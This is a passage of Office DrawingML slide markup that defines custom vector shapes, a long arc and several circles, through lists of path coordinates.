                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1378472" y="2156689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1331470" y="2176311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1284810" y="2196570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238499" y="2217462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192542" y="2238983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1146947" y="2261128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1101718" y="2283893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056862" y="2307274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012384" y="2331266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968291" y="2355865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924589" y="2381066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="881283" y="2406865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838381" y="2433258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795887" y="2460241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="753807" y="2487808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712149" y="2515956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="670917" y="2544680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630118" y="2573976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="589757" y="2603839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549841" y="2634265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510376" y="2665250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471368" y="2696789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432823" y="2728878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394746" y="2761513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357144" y="2794688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320023" y="2828401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283388" y="2862646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247247" y="2897419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211604" y="2932715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176465" y="2968531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141838" y="3004861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107727" y="3041702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74140" y="3079050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41080" y="3116898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8556" y="3155245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3189779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6681" y="3201158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22399" y="3205473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34851" y="3217837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49911" y="3219603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64994" y="3214305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77517" y="3205473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108780" y="3168049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140581" y="3131125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172913" y="3094703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205769" y="3058786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239141" y="3023377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273024" y="2988480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307410" y="2954096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342292" y="2920228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377663" y="2886881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413517" y="2854055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449846" y="2821755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486643" y="2789984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523902" y="2758743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561616" y="2728036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599777" y="2697867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638379" y="2668237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677415" y="2639149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716877" y="2610607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="756760" y="2582613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="797055" y="2555171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837757" y="2528283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878857" y="2501951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="920350" y="2476180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="962228" y="2450971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004485" y="2426328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1047112" y="2402254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1090105" y="2378750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1133454" y="2355821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177155" y="2333469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221199" y="2311698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265580" y="2290509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1310290" y="2269905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355324" y="2249891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400673" y="2230468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1446331" y="2211639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1492292" y="2193408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1538547" y="2175776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1585091" y="2158748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1631916" y="2142326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679016" y="2126512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1726382" y="2111310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1774010" y="2096723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821890" y="2082753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1870018" y="2069403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1918385" y="2056677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1966985" y="2044576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015810" y="2033104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2064855" y="2022265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2114111" y="2012059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163573" y="2002492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2213232" y="1993565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2263083" y="1985281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2313118" y="1977643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2363330" y="1970654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2413712" y="1964318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2464258" y="1958636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2514961" y="1953611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2565812" y="1949248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2616807" y="1945548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2667937" y="1942514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719196" y="1940149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770577" y="1938456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822073" y="1937439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2873676" y="1937099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2925100" y="1937428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2976382" y="1938415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3027517" y="1940056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3078498" y="1942349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3129320" y="1945291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3179979" y="1948878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3230468" y="1953110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3280782" y="1957982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3330917" y="1963492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3380865" y="1969637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3430623" y="1976415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3480184" y="1983822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3529543" y="1991856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3578695" y="2000515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3627634" y="2009795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3676355" y="2019694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3724852" y="2030208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3773121" y="2041336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3821155" y="2053075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3868949" y="2065421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3916498" y="2078372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3963796" y="2091925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4010839" y="2106078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4057620" y="2120828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4104134" y="2136171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4150376" y="2152106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4196340" y="2168630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4242021" y="2185739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4287413" y="2203431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4332511" y="2221704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4377310" y="2240554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4421805" y="2259978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4465989" y="2279975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4509857" y="2300541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4553405" y="2321674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4596626" y="2343370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4639515" y="2365628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4682066" y="2388444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4724275" y="2411815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4766136" y="2435739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4807644" y="2460213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4848792" y="2485235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4889576" y="2510801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4929991" y="2536909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4970030" y="2563556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5009688" y="2590739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5048961" y="2618456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5087842" y="2646704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5126326" y="2675480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5164408" y="2704781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5202082" y="2734605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5239343" y="2764949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5276185" y="2795809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5312604" y="2827184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5348593" y="2859071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5384147" y="2891467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5419262" y="2924369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5453930" y="2957774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5488148" y="2991679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5521909" y="3026083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5555208" y="3060982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5588040" y="3096373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5620399" y="3132254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5652280" y="3168621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5683678" y="3205473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5686038" y="3212735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5692267" y="3216463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5701091" y="3217837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5711237" y="3218033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5713597" y="3217837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5719826" y="3216463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5728650" y="3212735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5738796" y="3205473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5746511" y="3201158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5749083" y="3189779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5746511" y="3173691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5738796" y="3155245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5706736" y="3116876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5674140" y="3079054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5641014" y="3041780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5607366" y="3005054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5573202" y="2968879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5538529" y="2933255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5503355" y="2898184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5467686" y="2863667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5431529" y="2829704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5394892" y="2796299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5357780" y="2763451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5320203" y="2731162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5282165" y="2699434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5243675" y="2668267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5204739" y="2637662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5165364" y="2607622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5125558" y="2578147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5085327" y="2549239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5044678" y="2520898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5003618" y="2493127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4962154" y="2465926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4920294" y="2439296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4878044" y="2413240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4835411" y="2387757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4792402" y="2362850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4749024" y="2338520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4705284" y="2314767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4661190" y="2291594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4616747" y="2269001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4571964" y="2246990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4526847" y="2225562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4481402" y="2204718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4435638" y="2184460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4389561" y="2164788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4343178" y="2145704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4296496" y="2127210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4249521" y="2109306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4202262" y="2091994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4154725" y="2075275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5187743" y="1171035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5195530" y="1154142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5198125" y="1139618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5195530" y="1125118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5187743" y="1108297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5169237" y="1101224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5153326" y="1098867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5137415" y="1101224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5118909" y="1108297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4072048" y="2050129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4025104" y="2034102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3977711" y="2018789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3929891" y="2004188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3881664" y="1990300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3833049" y="1977125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3784068" y="1964663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3734741" y="1952913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3685088" y="1941876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3635128" y="1931552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3584884" y="1921940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3534374" y="1913040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3483619" y="1904852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3432639" y="1897377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381455" y="1890615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3330087" y="1884564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3278555" y="1879225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3226880" y="1874599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3175081" y="1870684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123180" y="1867481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3071196" y="1864990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3019150" y="1863211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2967061" y="1862144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2914951" y="1861788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2914951" y="28289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2902053" y="7072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2873676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597652" y="4946903"/>
              <a:ext cx="5156200" cy="1859280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5156200" h="1859279">
                  <a:moveTo>
                    <a:pt x="743712" y="1384554"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="740803" y="1337627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732345" y="1292440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718680" y="1249337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700138" y="1208671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677075" y="1170813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649859" y="1136078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618807" y="1104849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584288" y="1077455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546658" y="1054252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506247" y="1035608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463410" y="1021842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418490" y="1013333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371856" y="1010412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325208" y="1013333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280289" y="1021842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237451" y="1035608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197040" y="1054252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159410" y="1077455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124891" y="1104849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93840" y="1136078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66624" y="1170813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43561" y="1208671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25019" y="1249337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11353" y="1292440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2895" y="1337627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1384554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2895" y="1431493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11353" y="1476679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25019" y="1519783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43561" y="1560449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66624" y="1598307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93840" y="1633042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124891" y="1664271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159410" y="1691665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197040" y="1714868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237451" y="1733511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280289" y="1747278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325208" y="1755787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371856" y="1758696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418490" y="1755787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463410" y="1747278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506247" y="1733511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546658" y="1714868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584288" y="1691665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618807" y="1664271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649859" y="1633042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677075" y="1598307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700138" y="1560449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718680" y="1519783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732345" y="1476679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="740803" y="1431493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743712" y="1384554"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5156200" h="1859279">
                  <a:moveTo>
                    <a:pt x="2948940" y="374142"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2946031" y="327215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2937573" y="282028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923908" y="238925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2905366" y="198259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882303" y="160401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2855087" y="125666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2824035" y="94437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2789517" y="67043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2751886" y="43840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2711475" y="25196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2668638" y="11430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2623718" y="2921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2577084" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2530437" y="2921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2485517" y="11430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442680" y="25196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2402268" y="43840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2364638" y="67043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330119" y="94437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299068" y="125666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2271852" y="160401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248789" y="198259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2230247" y="238925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216581" y="282028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2208123" y="327215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205228" y="374142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2208123" y="421081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216581" y="466267"/>
                  </a:lnTo>
